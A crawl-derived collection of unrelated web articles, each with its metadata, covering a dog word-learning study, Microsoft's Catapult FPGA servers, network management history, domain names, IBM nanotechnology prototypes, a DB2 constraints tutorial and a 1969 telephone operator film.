Alice Lipowicz is a staff writer covering government 2.0, homeland security and other IT policies for Federal Computer Week. | <urn:uuid:0a159c37-70e2-46da-9686-99557e05dd3c> | CC-MAIN-2017-09 | https://fcw.com/articles/2010/10/11/feat-jim-shelton-education-qanda.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00509-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958444 | 1,262 | 2.53125 | 3 |
Human babies learn words through repetition, obviously, but also by associating words with shapes (in the case of objects). Curious whether dogs learned the names of objects in the same way as people, some researchers at the University of Lincoln in the United Kingdom put a five-year-old Border Collie -- reputedly the world's smartest breed of dog -- through its language-recognition paces. What they discovered was that dogs (or at least this dog) used a different technique than the "shape bias" employed by humans to learn the words associated with objects. From the online scientific research journal Plos One:
Two experiments showed that when briefly familiarized with word-object mappings the dog did not generalize object names to object shape but to object size. [Another] experiment showed that when familiarized with a word-object mapping for a longer period of time the dog tended to generalize the word to objects with the same texture. These results show that the dog tested did not display human-like word comprehension, but word generalization and word reference development of a qualitatively different nature compared to humans.
As to why that is, the researchers speculated that "the evolutionary history of our sensory systems – with vision taking priority over other sensory systems – seems to have primed humans to take into account visual object shape in object naming tasks." Whereas dogs (and many other animals) rely much more strongly on their senses of smell and hearing to make sense of the world. Of course, it's incumbent upon humans as partners and guardians of dogs to also understand how our canine friends communicate with us and each other. Here's one article about understanding dog "talk." Now read this: | <urn:uuid:b68b187e-aa8e-4e6d-a9c4-3eb7115898f5> | CC-MAIN-2017-09 | http://www.itworld.com/article/2718271/enterprise-software/how-dogs-learn-names-of-new-objects.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00382-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.95224 | 340 | 3.328125 | 3 |
For years, Microsoft has been delivering speedy and accurate Bing results with experimental servers called Project Catapult, which have now received an architectural upgrade.
The Catapult servers use reprogrammable chips called FPGAs (field programmable gate arrays), which are central to delivering better Bing results. FPGAs can quickly score, filter, rank, and measure the relevancy of text and image queries on Bing.
Microsoft has now redesigned the original Catapult server, which is used to investigate the role of FPGAs in speeding up servers. The proposed Catapult v2 design is more flexible in circumventing traditional data-center structures for machine learning and expands the role of FPGAs as accelerators.
Microsoft presented the Catapult v2 design for the first time earlier this month at the Scaled Machine Learning conference in Stanford, California.
Microsoft's data centers drive services like Cortana and Skype Translator, and the company is constantly looking to upgrade server performance. Microsoft is also working with Intel to implement silicon photonics, in which fiber optics will replace copper wires for faster communications between servers in data centers.
Catapult v2 expands the availability of FPGAs, allowing them to be hooked up to a larger number of computing resources. The FPGAs are connected to DRAM, the CPU, and network switches.
The FPGAs can accelerate local applications, or be a processing resource in large-scale, deep-learning models. Much like with Bing, the FPGAs can be involved in scoring results and training of deep-learning models.
The new model is a big improvement from the original Catapult model, in which FPGAs were limited to a smaller network within servers.
The Catapult v2 design can be used for cloud-based image recognition, natural language processing, and other tasks typically associated with machine learning.
Catapult v2 could also provide a blueprint for using FPGAs in machine learning installations. Many machine learning models are driven by GPUs, but the role of FPGAs is less clear. Baidu has also used FPGAs in data centers for deep learning.
FPGAs can quickly deliver deep-learning results, but they can be notoriously power hungry if not programmed correctly. They can be reprogrammed to execute specific tasks, but that also makes them one dimensional. GPUs are more flexible and can handle several calculations, but FPGAs can be faster at given tasks.
Many large companies are showing interest in FPGAs. Intel earlier this year completed the US$16.7 billion acquisition of Altera, an FPGA vendor. Intel will put Altera FPGAs in cars, servers, robots, drones, and other devices.
Outside of Microsoft, a Catapult server, used for machine learning, is installed at the Texas Advanced Computing Center at the University of Texas, Austin. The system is small, with 32 two-socket Intel Xeon servers, which are packed with 64GB of memory, and an Altera Stratix V D5 FPGA with its own 8GB DDR3 memory cache. | <urn:uuid:016bf606-7ccf-4f03-ac20-5a96aac2d129> | CC-MAIN-2017-09 | http://www.itnews.com/article/3113496/microsofts-new-catapult-v2-server-design-is-targeted-at-ai.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00082-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940585 | 628 | 2.6875 | 3 |
Understanding the Classic Network Management Architectures
Our previous tutorial began our series on enterprise network management, and looked at the five functional areas of network management defined by the ISO as part of its research into the seven-layer Open Systems Interconnection (OSI) model. To review, these five areas are:
- fault management
- accounting management
- configuration management
- performance management
- security management
But let’s take a step back for a moment, and recognize that the typical enterprise network manager has many subsystems that he or she is responsible for. You are likely dealing with some type of centralized or distributed computing system, local and wide area data networks (LANs and WANs), Internet access, and possibly a video conferencing network. You many also have deployed integrated applications, such as VoIP, call centers or unified messaging, which depend on a mix of voice and data elements. There are likely desktop workstations, perhaps running under Windows, Mac OS and/or UNIX/Linux, plus all of the applications that run on those workstations. In addition, you probably have some backup systems, protecting the data storage, power, and possibly WAN access, which are also part of the mix. So when we consider these five network management areas, we need to discuss them in the context of the integrated enterprise network, not as a singular function.
If we look at this enterprise challenge from a historical perspective, the network management business of a decade or two ago was dominated by two industries: the mainframe computer vendors and the telecommunications providers. You may have heard of IBM’s NetView, Digital Equipment Corporation’s Enterprise Management Architecture (EMA), and AT&T’s Unified Network Management Architecture (UNMA), that fit the mold of a centralized management system that would allow input from distributed elements such as a minicomputer (in DEC’s case) or a PBX (in AT&T’s case). But as networking architectures became more distributed, network management systems evolved as well. Instead of a centralized system, where all of system performance information was associated with a large system, such as the mainframe or a PBX, distributed models, based upon client/server networking were developed.
With this shift toward distributed computing, the 1990s also brought about the development of two different architectures and protocols for distributed systems management. First, the ITU-T furthered the ISO’s network management efforts, publishing a network management framework defined in ITU-T document X.700. Also defined was a network management protocol that would facilitate communication between the managed elements and the management console, called the Common Management Information Protocol, or CMIP, which is defined in other X.700-series recommendations (of which there are many). Management of telecommunications networks in particular is addressed in an architecture called the Telecommunications Management Network, or TMN, which is defined in the M.3000-series of recommendations, and http://www.itu.int/rec/T-REC-M.3010-200002-I/en). This architecture provides a framework for connecting dissimilar systems and networks, and allows managed elements from different manufacturers to be incorporated into a single management system. This architecture has been most popular with the telcos, likely owing to their allegiance to the ITU-T, and its emphasis on telephony-related research and standards.
The 1990s also brought about the Internet surge, and with that came a friendly rivalry between some of the incumbent standards bodies (such as the ISO and ITU-T) that many considered slow and bureaucratic, and the Internet Engineering Task Force (IETF), that was more likely to be on the cutting edge and therefore quicker to respond to new innovations. Also at that time, the networking community was patiently waiting for computing and communications vendors to embrace the seven-layer OSI model in their products, and after a few years, grew impatient. That environment gave rise to the development of the IETF’s own network management architecture, called the Internet Network Management Framework, and an accompanying protocol, the Simple Network Management Protocol, or SNMP. This network management system embeds simple agents inside networking devices, such as workstations, gateways and servers, which report operational status and exception conditions to the network manager, which provides oversight for the enterprise or a portion of that enterprise. Communication between agents and manager is handled by the SNMP. Further work defined a concept called RMON, short for Remote Monitoring, documented in RFC 2819t , which allow agents on remote networking segments to report back to a centralized manager. Sun Microsystem’s Solstice Enterprise Manager (formerly named SunNet Manager), and Hewlett-Packard’s OpenView were two systems developed during this era that relied heavily on SNMP and RMON technology.
But as you might expect, Microsoft is always up for a good challenge (especially when the names IBM and Sun are part of the discussion), and developed a network management platform of its own called the Systems Management Server. Currently in its 2003 release (see http://www.microsoft.com/smserver/evaluation/default.mspx), this package includes components for software inventory, software update compliance testing, publishing and integrating new applications, assessments of system vulnerability and security, and more.
But no matter how large your enterprise, and the breadth of existing network management systems that you have deployed to support mainframe, WAN, or LAN environments, it’s not likely that a single system can adequately manage your entire networking infrastructure. And the reason is pretty simple – traditional networking management focuses on the systems, making sure that disk storage is adequate, the CPU is not over-utilized, a WAN link has sufficient capacity, or the number of collisions on the Ethernet LAN is not excessive. But the other key area is the domain of the end users, and their applications – which can run the spectrum from a server-resident database to desktop video conferencing. In other words, the performance management, since it directly impacts the productivity of your end users (and occurs in real time), is a crucial factor.
Our next tutorial will drill down a little deeper, and consider some of the real time management challenges that occur at each layer of the OSI Reference Model.
Copyright Acknowledgement: ©2009 DigiNet Corporation, All Rights Reserved
Mark A. Miller, P.E. is President of DigiNet Corporation, a Denver-based consulting engineering firm. He is the author of many books on networking technologies, including Voice over IP Technologies, and Internet Technologies Handbook, both published by John Wiley & Sons. | <urn:uuid:98c16fad-8737-49fc-be07-dda6803039d6> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsp/article.php/3819086/Understanding-the-Classic--Network-Management-Architectures.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00258-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.937495 | 1,362 | 2.625 | 3 |
Thanks to the finite speed of light, which places a fundamental minimum on the time it takes an electrical signal to travel a specified distance, improvements in computer processor technology require devices to become smaller and smaller. But as individual components (for instance, transistors) approach the size of the atoms that compose them, progress becomes increasingly difficult. In what may be achievements that help keep Moore’s Law alive, however, IBM has announced new developments in several nanotechnology pursuits that could keep the miniaturization train moving forward a little longer.
At this year’s IEEE International Electron Devices Meeting earlier this month, IBM introduced three prototype devices applying the company’s research in racetrack memory, graphene and carbon nanotubes. IBM’s motivation for these pursuits arise, in part at least, from the growing difficulty of gaining increased device performance through “simple” shrinks of silicon manufacturing process technologies. For years, scaling down processors was sufficient to increase performance, decrease power consumption and (of course) reduce size. But ultimately, this driver for Moore’s Law will run out of steam when device sizes reach (somewhere near) the size of the atoms that constitute them.
“For more than 50 years, computer processors have increased in power and shrunk in size at a tremendous rate. However, today’s chip designers are hitting physical limitations with Moore’s Law, halting the pace of product innovation from scaling alone,” said the company in a press release earlier this week (“Made in IBM Labs: Researchers Demonstrate Future of Computing with Graphene, Racetrack and Carbon Nanotube Breakthroughs”).
Other companies have illustrated the growing need to look beyond just making transistors smaller; Intel, for instance, announced earlier this year its new FinFET technology (“Intel Increases Transistor Speed by Building Upward”), which uses three-dimensional structures to pack more transistors into less space on a chip. Although Intel’s approach is beneficial and even somewhat novel, it is not necessarily a conceptual breakthrough (in the sense that it is still a matter of packing more semiconductor-based transistors into less area). Ultimately, keeping Moore’s Law alive will require more-revolutionary technologies.
IBM is trying to fit this bill by demonstrating working prototypes of its technologies. The company notes, “With virtually all electronic equipment today built on complementary-symmetry metal–oxide–semiconductor (CMOS) technology, there is an urgent need for new materials and circuit architecture designs compatible with this engineering process as the technology industry nears physical scalability limits of the silicon transistor.” One of the critical successes of the company’s latest developments is their successful integration on 200mm wafers, opening the door to larger scale use in conjunction with existing semiconductor devices.
Graphene, a polycyclic structure built exclusively of carbon atoms (note the similarity to the name of the more commonly known material graphite), has been touted as a “miracle material” owing to its remarkable features: it is extremely strong and highly conductive, and graphene sheets are just one carbon atom thick. A BBC report on the material (“Is graphene a miracle material?”) identifies graphene as the strongest and most conductive substance known to man, having a range of potential applications that make it the metaphorical “plastic” of the 21st century.
IBM, following on the heels of MIT’s creation of a graphene frequency multiplier (“Graphene works as a frequency multiplier”), has integrated a CMOS-compatible version of this device on a 200mm wafer. (A frequency multiplier is a device that outputs a signal whose frequency is an integral multiple of the input signal’s frequency.) According to the company, the device operates at up to 5GHz and promises stability in adverse conditions, such as high-temperature and high-radiation environments. IBM stated that its prototype device is stable up to 200 degrees Celsius. “Instead of trying to deposit gate dielectric on an inert graphene surface, the researchers developed a novel embedded gate structure that enables high device yield on a 200mm wafer,” said the company in its press release. The new development—if commercially and technically feasible in advanced components—could enable higher-frequency devices and more-powerful communications systems.
In another step forward, IBM has taken its racetrack memory concept—which the company first developed in 2002—and applied it to CMOS devices on 200mm wafers. So-called racetrack memory uses nanowires to hold “strings” of data. According to an IBM article (“Racetrack Memory”), the concepts originator, Stuart Parkin, “conceived of a device consisting of a city of skyscrapers—each one only hundreds of atoms wide—of magnetic material, with each floor of each skyscraper containing a single bit of data. The data is shot up and down the skyscrapers—almost like a supersonic elevator—by using special currents of electrons. . . These currents are generated by a transistor connected to the bottom of each skyscraper.”
This design allows a transistor to store many bits of data rather than just one, greatly expanding the potential capacity of memory devices. IBM’s recent prototype is able to perform both read and write functions and consists of 256 planar racetracks. The company believes this breakthrough will enable further progress through creation of three-dimensional racetrack structures that increase density and reliability. Racetrack memory’s unique characteristics result from its combination of the advantages of both magnetic hard drives and solid-state memory devices, and with further development, it offers the potential of ameliorating the growing concern over data storage.
IBM’s third announced prototype uses carbon nanotubes to implement a transistor with channel lengths below 10nm. Carbon nanotubes are closely related to graphene—they are essentially the cylindrical analog of graphene sheets, being composed of conjoined hexagonal rings of carbon atoms. Nanotubes are like tiny wires, and they can be manipulated (using, for instance, an atomic force microscope) to adjust both their shape and behavior.
Although they are extremely strong, like graphene, carbon nanotubes vary in their electrical properties, ranging from semiconductor-like materials to metal-like materials. The company believes that components similar to its prototype will meet the need for “transistors with a channel length below 10 nm, a length scale at which conventional silicon technology will have extreme difficulty performing even with new advanced device architectures.”
How Far Can These Technologies Go?
Periodically, the Data Center Journal reports on new technologies that may be the foundation of future breakthroughs that affect the data center and IT as a whole. The potential of new research and prototypes, like those of IBM discussed above, can be exciting, but some perspective is always needed. For one reason or another, many innovations fall by the wayside, whether for economic, technical or practical reasons. Even the coolest technology, if it can’t be commercialized, will probably fall into the dustbin of history. Part of the excitement of following research progress, however, is seeing which unique concepts are able to move from “gee, that’s a neat idea” to “wow, everybody is using this now.”
So, will IBM’s latest prototypes be the foundation of a new breed of technologies that revolutionize the computing world? The safe bet is “no” (going simply by the odds), but only time will tell. As conventional scaling of process technologies reaches its limit, the need for unique approaches to increasing processor performance will grow. We may even have to wait for Moore’s Law to begin sputtering a bit before technologies such as graphene and nanotubes become feasible. And at such a time, even some forgotten innovations may be given a second look. | <urn:uuid:5b8595c2-c8e0-4194-aac6-da17f817c749> | CC-MAIN-2017-09 | http://www.datacenterjournal.com/ibm-pushes-nanotechnology-frontiers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00430-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.931139 | 1,660 | 3.671875 | 4 |
- "Can't be nuthin'!" - The NOT NULL constraint
- "For singles only" - The unique constraint
- "We're number one!" - The primary key constraint
- "It's all relative" - The foreign key constraint
- "Check and check again" - The table check constraint
- Downloadable resources
- Related topics
This content is part # of # in the series: DB2 Basics
This content is part of the series: DB2 Basics
Stay tuned for additional content in this series.
This section describes the differences in the structures of the DB2 and solidDB SQL procedures.
Constraints are used by DB2 for Linux, UNIX, and Windows (DB2 LUW) to enforce business rules for data. This article describes the following types of constraints:
- NOT NULL
- Primary key
- Foreign key
- Table check
There is another type of constraint known as an informational constraint. Unlike the five constraint types listed above, an informational constraint is not enforced by the database manager, but it can be used by the SQL compiler to improve query performance. This article focuses on only the types of constraints in the list.
You can define one or more DB2 constraints when you create a new table, or you can define some of them by altering the table later. The CREATE TABLE statement is very complex. In fact, it is so complex that although only a small fraction of its options are used in constraint definitions, those options can themselves appear to be quite complex when viewed in a syntax diagram, as shown in Figure 1.
Figure 1. Partial syntax of the CREATE TABLE statement, showing clauses that are used in defining constraints
Constraints management can be simpler and more convenient when done through the DB2 Control Center.
Constraints definitions are associated with the database to which they apply, and they are stored in the database catalog, as shown in Table 1. You can query the database catalog to retrieve and inspect this information. You can do so directly from the command line (remember to establish a database connection first), or, again, you might find it more convenient to access some of this information through the DB2 Control Center.
The constraints that you create are handled like any other database objects. They are named, have an associated schema (creator ID), and in some cases can be dropped (deleted).
Figure 2. Partial syntax of the CREATE TABLE statement, showing clauses that are used in defining constraints (continued)
Table 1 shows constraints information in the database catalog. To run successfully, queries against the catalog require a database connection.
Table 1. Constraints information in the database catalog
|Catalog view||View column||Description||Query example|
|SYSCAT.CHECKS||Contains a row for each table check constraint||db2 select constname, tabname, text from syscat.checks|
|SYSCAT.COLCHECKS||Contains a row for each column that is referenced by a table check constraint||db2 select constname, tabname, colname, usage from syscat.colchecks|
|SYSCAT.COLUMNS||NULLS||Indicates whether a column is nullable (Y) or not nullable (N)||db2 select tabname, colname, nulls from syscat.columns where tabschema = 'DELSVT' and nulls = 'N'|
|SYSCAT.CONSTDEP||Contains a row for each dependency of a constraint on some other object||db2 select constname, tabname, btype, bname from syscat.constdep|
|SYSCAT.INDEXES||Contains a row for each index.||db2 select tabname, uniquerule, made_unique, system_required from syscat.indexes where tabschema = 'DELSVT'|
|SYSCAT.KEYCOLUSE||Contains a row for each column that participates in a key defined by a unique, primary key, or foreign key constraint||db2 select constname, tabname, colname, colseq from syscat.keycoluse|
|SYSCAT.REFERENCES||Contains a row for each referential constraint||db2 select constname, tabname, refkeyname, reftabname, colcount, deleterule, updaterule from syscat.references|
|SYSCAT.TABCONST||Contains a row for each unique (U), primary key (P), foreign key (F), or table check (K) constraint||db2 select constname, tabname, type from syscat.tabconst|
|SYSCAT.TABLES||PARENTS||Number of parent tables of this table (the number of referential constraints in which this table is a dependent)||db2 "select tabname, parents from syscat.tables where parents > 0"|
|SYSCAT.TABLES||CHILDREN||Number of dependent tables of this table (the number of referential constraints in which this table is a parent)||db2 "select tabname, children from syscat.tables where children > 0"|
|SYSCAT.TABLES||SELFREFS||Number of self-referencing referential constraints for this table (the number of referential constraints in which this table is both a parent and a dependent)||db2 "select tabname, selfrefs from syscat.tables where selfrefs > 0"|
|SYSCAT.TABLES||KEYUNIQUE||Number of unique constraints (other than primary key) defined on this table||db2 "select tabname, keyunique from syscat.tables where keyunique > 0"|
|SYSCAT.TABLES||CHECKCOUNT||Number of check constraints defined on this table||db2 "select tabname, checkcount from syscat.tables where checkcount > 0"|
"Can't be nuthin'!" - The NOT NULL constraint
The NOT NULL constraint prevents null values from being added to a
column. This ensures that the column has a meaningful value for each row
in the table. For example, the definition of the EMPLOYEE table in the
SAMPLE database includes
LASTNAME VARCHAR(15) NOT
which ensures that each row contains an employee's last name.
To determine whether a column is nullable, you can refer to the data
definition language (DDL) for the table (which you can generate by
db2look utility). You can use the DB2 Control
Center, as shown in Figure 3 and Figure 4.
Figure 3. View of tables in the Control Center
The DB2 Control Center lets you conveniently access database objects such as tables. Figure 3 shows the user tables in the SAMPLE database. They appear in the contents pane when Tables is selected in the object tree. If you select the STAFF table, you can open the Alter Table window to see the table definition, including the column attributes shown in Figure 4.
Figure 4. Alter Table screen in the Control Center
Or you can query the database catalog, as shown in Listing 1.
Listing 1. Querying the database catalog to determine which table columns are nullable
db2 select tabname, colname, nulls from syscat.columns where tabschema = 'DELSVT' and nulls = 'N'
"For singles only" - The unique constraint
The unique constraint prevents a value from appearing more than once within a particular column in a table. It also prevents a set of values from appearing more than once within a particular set of columns. Columns that are referenced in a unique constraint must be defined as NOT NULL. The unique constraint can be defined in the CREATE TABLE statement using the UNIQUE clause (Figure 1 and Figure 2), or in an ALTER TABLE statement, as shown in Listing 2.
Listing 2 shows how to create a unique constraint. The ORG_TEMP table is identical to the ORG table in the SAMPLE database, except that the LOCATION column in ORG_TEMP is not nullable, and the LOCATION column can have a unique constraint defined on it.
Listing 2. Creating a unique constraint
db2 create table org_temp ( deptnumb smallint not null, deptname varchar(14), manager smallint, division varchar(10), location varchar(13) not null) db2 alter table org_temp add unique (location) db2 insert into org_temp values (10, 'Head Office', 160, 'Corporate', 'New York') DB20000I The SQL command completed successfully. db2 insert into org_temp values (15, 'New England', 50, 'Eastern', 'New York') DB21034E The command was processed as an SQL statement because it was not a valid Command Line Processor command. During SQL processing it returned: SQL0803N One or more values in the INSERT statement, UPDATE statement, or foreign key update caused by a DELETE statement are not valid because the primary key, unique constraint or unique index identified by "1" constrains table "DELSVT.ORG_TEMP" from having duplicate values for the index key. SQLSTATE=23505
The unique constraint helps to ensure data integrity by preventing unintentional duplication. In the example, the unique constraint prevents the insertion of a second record specifying New York as a branch location for the organization. The unique constraint is enforced through a unique index.
"We're number one!" - The primary key constraint
The primary key constraint ensures that all values in the column or the set of columns that make up the primary key for a table are unique. The primary key is used to identify specific rows in the table. A table cannot have more than one primary key, but it can have several unique keys. The primary key constraint is a special case of the unique constraint, and it is enforced through a primary index.
Columns that are referenced in a primary key constraint must be defined as NOT NULL. The primary key constraint can be defined in the CREATE TABLE statement using the PRIMARY KEY clause (see Figure 1 and Figure 2), or in an ALTER TABLE statement as shown in Listing 3.
Listing 3 shows how to create a primary key constraint. The ID column in the STAFF table is not nullable, and it can have a primary key constraint defined on it.
Listing 3. Creating a primary key constraint
db2 alter table staff add primary key (id)
Alternatively, you can use the DB2 Control Center to define a primary key constraint on a table, as shown in Figure 5 and Figure 6. The Alter Table window provides a convenient way to define a primary key constraint on a table. Select the Keys tab, then click Add Primary.
Figure 5. The Alter Table window
The Define Primary Key window appears, as shown in Figure 6.
Figure 6. The Define Primary Key window
The Define Primary Key window enables you select one or more columns from the Available column list. Click the > button to move names from the Available column list to the Selected column. Note that the selected columns must not be nullable.
"It's all relative" - The foreign key constraint
The foreign key constraint is sometimes referred to as the referential constraint. Referential integrity is defined as the state of a database in which all values of all foreign keys are valid. So what is a foreign key? A foreign key is a column or a set of columns in a table whose values must match at least one primary key or unique key value of a row in its parent table. What exactly does that mean? It's actually not as bad as it sounds. It simply means that if a column (C2) in a table (T2) has values that match values in a column (C1) of another table (T1), and C1 is the primary key column for T1, then C2 is a foreign key column in T2. The table containing the parent key (a primary key or a unique key) is called the parent table, and the table containing the foreign key is called the dependent table. Consider the following example.
The PROJECT table in the SAMPLE database has a column called RESPEMP. Values in this column represent the employee numbers of the employees who are responsible for each project listed in the table. RESPEMP is not nullable. Because this column corresponds to the EMPNO column in the EMPLOYEE table, and EMPNO is now the primary key for the EMPLOYEE table, RESPEMP can be defined as a foreign key in the PROJECT table, as shown in Listing 4. This ensures that future deletions from the EMPLOYEE table will not leave the PROJECT table with non-existent responsible employees.
Listing 4. Creating a foreign key constraint
db2 alter table project add foreign key (respemp) references employee on delete cascade
The REFERENCES clause points to the parent table for this referential constraint. The syntax for defining a foreign key constraint includes a rule-clause, which is where you can tell DB2 how you want update or delete operations handled from a referential integrity perspective (see Figure 1).
Insert operations are handled in a standard way over which you have no control. The insert rule of a referential constraint is that an insert value of the foreign key must match some value of the parent key of the parent table. This is consistent with what has already been said. If a new record is to be inserted into the PROJECT table, that record must contain a reference (through the parent-foreign key relationship) to an existing record in the EMPLOYEE table.
The update rule of a referential constraint is that an update value of the foreign key must match some value of the parent key of the parent table, and that all foreign key values must have matching parent key values when an update operation on the parent key completes. Again, all that this means is that there cannot be any orphans, and each dependent must have a parent.
The delete rule of a referential constraint applies when a row is deleted from a parent table, depending on what option was specified when the referential constraint was defined.
Table 2. Referential constraint options
|If this clause was specified when the referential restraint was created...||Then this is the result|
|RESTRICT or NO ACTION||No rows are deleted|
|SET NULL||Each nullable column of the foreign key is set to null|
|CASCADE||The delete operation is propagated to the dependents of the parent table. These dependents are said to be delete-connected to the parent table.|
Listing 5 shows some of these points.
Listing 5. Demonstrating the update rule and the delete rule in a foreign key constraint
db2 update employee set empno = '350' where empno = '000200' DB20000I The SQL command completed successfully. db2 update employee set empno = '360' where empno = '000220' DB21034E The command was processed as an SQL statement because it was not a valid Command Line Processor command. During SQL processing it returned: SQL0531N The parent key in a parent row of relationship "DELSVT.PROJECT.FK_PROJECT_2" cannot be updated. SQLSTATE=23504 db2 "select respemp from project where respemp < '000050' order by respemp" RESPEMP ------- 000010 000010 000020 000030 000030 5 record(s) selected. db2 delete from employee where empno = '000010' DB21034E The command was processed as an SQL statement because it was not a valid Command Line Processor command. During SQL processing it returned: SQL0532N A parent row cannot be deleted because the relationship "DELSVT.PROJECT.FK_PROJECT_2" restricts the deletion. SQLSTATE=23001 db2 "select empno from employee where empno < '000050' order by empno" EMPNO ------ 000010 000020 000030 3 record(s) selected.
The EMPNO value of
000200 in the parent table (EMPLOYEE) can
be changed, because there is no RESPEMP value of
the dependent table (PROJECT). However, for the EMPNO value of
000220, it has matching foreign key values in the PROJECT
table, and therefore, it cannot be updated. The delete rule specifying the
RESTRICT option ensures that no rows that contain the primary key value of
000010 can be deleted from the EMPLOYEE table when the
delete-connected PROJECT table contains the matching foreign key
"Check and check again" - The table check constraint
A table check constraint enforces defined restrictions on data being added to a table. For example, a table check constraint can ensure that the telephone extension for an employee is exactly four digits long whenever telephone extensions are added or updated in the EMPLOYEE table. Table check constraints can be defined in the CREATE TABLE statement using the CHECK clause (see Figure 1 and Figure 2), or in an ALTER TABLE statement, as shown in Listing 6.
Listing 6. Creating a table check constraint
db2 alter table employee add constraint phoneno_length check (length(rtrim(phoneno)) = 4)
The PHONENO_LENGTH constraint ensures that telephone extensions added to the EMPLOYEE table are exactly four digits long.
Alternatively, you can use the DB2 Control Center to define a table check constraint, as shown in Figure 7.
Figure 7. The Alter Table window provides a convenient way to define a table check constraint on a column
Click the Add button to define a new constraint, and the Add Check Constraint window opens. Or click the Change button to modify an existing constraint that you have selected from the list, as shown in Figure 8.
Figure 8. The Change Check Constraint window lets you modify an existing check condition
You cannot create a table check constraint if existing rows in the table contain values that violate the new constraint, as shown in Figure 9. You can successfully add or modify the constraint after the incompatible values are appropriately updated.
Figure 9. An error is returned if the new table check constraint is incompatible with existing values in the table
Table check constraints can be turned on or off using the SET INTEGRITY
statement. This can be useful, for example, when optimizing performance
during large data load operations against a table. Listing 7 shows how to
code a simple scenario showing one possible approach to using the SET
INTEGRITY statement. In this example, the telephone extension for employee
000100 is updated to a value of
123, after which integrity
checking of the EMPLOYEE table is turned off. A check constraint requiring
4-digit telephone extension values is defined on the EMPLOYEE table. An
exception table called EMPL_EXCEPT is created. The definition of this new
table mirrors that of the EMPLOYEE table. Integrity checking is turned on,
with rows in violation of the check constraint being written to the
exception table. Queries against these tables confirm that the row in
question now exists only in the exception table.
Listing 7. Using the SET INTEGRITY statement to defer constraints checking
db2 update employee set phoneno = '123' where empno = '000100' db2 set integrity for employee off db2 alter table employee add constraint phoneno_length check (length(rtrim(phoneno)) = 4) db2 create table empl_except like employee db2 set integrity for employee immediate checked for exception in employee use empl_except SQL3602W Check data processing found constraint violations and moved them to exception tables. SQLSTATE=01603 db2 select empno, lastname, workdept, phoneno from empl_except EMPNO LASTNAME WORKDEPT PHONENO ------ --------------- -------- ------- 000100 SPENSER E21 123 1 record(s) selected.
This article explored the various types of constraints supported by DB2 for Linux, UNIX, and Windows, including the NOT NULL constraint, the unique constraint, the primary key constraint, the foreign key (referential) constraint, and table check constraints. DB2 uses constraints to enforce business rules for data and to help preserve database integrity. You also learned how to use both the command line and the DB2 Control Center (and how to query the database catalog) to effectively manage constraints.
- DB2 for Linux, UNIX and Windows support poartal
- IBM DB2 with BLU Acceleration for Linux, UNIX, and Windows download
- IBM DB2 Express-C download | <urn:uuid:1089fcd0-3041-4b00-9272-010adc461f09> | CC-MAIN-2017-09 | http://www.ibm.com/developerworks/data/library/techarticle/dm-0401melnyk/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171416.74/warc/CC-MAIN-20170219104611-00430-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.823915 | 4,422 | 2.546875 | 3 |
Domain Names Overview
Domain names are a hierarchical, administratively controlled namespace. Domain names provide an easy way for people to refer to a site.
|Shortcuts: -IANA's List
of country registrars or an unofficial list of
name registrars around the world (cached
Other related pages: Whois , Traceroute,
Internet connections are uniquely identified with an Internet Protocol (IP) number. IP numbers (IP version 4) are a set of 4 numbers, each one ranging from 0-255. (e.g. 220.127.116.11) IP numbers are difficult for people to remember, so many organizations will register a domain name which can be mapped to specific IP numbers. For more information about IP numbers see IANA (for example see this allocation of IP numbers)
The domain name system began with several globally shared domain names ( .com, .net, .org) as well as country-specific codes ( .jp, .de, .us, .uk) Over 1,000 new top level domain names started coming online starting in 2013.
|Domain Name Registration|
For more information see:
Contact me at 703-729-1757 or Russ
If you use email, put "internet training" in the subject of the email.
Copyright © Information Navigators | <urn:uuid:04aad658-9496-4cc6-9c67-5c4b53388145> | CC-MAIN-2017-09 | http://navigators.com/domain_name.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00478-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.803797 | 275 | 3.140625 | 3 |
We often take for granted the technology we're currently using - computers, cell phones, tablets, etc., that we often forget there was a time when these devices didn't exist.
Even making a telephone call was not as cut-and-dry as it is today - before computers took away most of these functions, people needed telephone operators to help connect calls and provide directory assistance.
The AT&T Archives channel on YouTube has posted a 17-minute video showcasing a film from 1969, entitled "Operator", which showcases the lives of telephone operators from the late '60s.
Several things fascinate me from this era. First, the mechanical nature of connecting calls back then. No computers or monitors are seen - and operators had to look up phone numbers via old-fashioned directories (when was the last time you used your phone book?). Second, I'm fascinated with the headsets these operators were using - many of today's Bluetooth headsets and voice headsets likely originated from these original designs. Finally, it's interesting to view customers' frustrations and attitudes with the operators (a funny moment is someone calling the operator to find out whether it was 6 a.m. or 6 p.m.). If you are interested at all about the history of technology, this video is worth 17 minutes of your time.
Keith Shaw rounds up the best in geek video in his ITworld.tv blog. Follow Keith on Twitter at @shawkeith. For the latest IT news, analysis and how-tos, follow ITworld on Twitter, Facebook, and Google+.
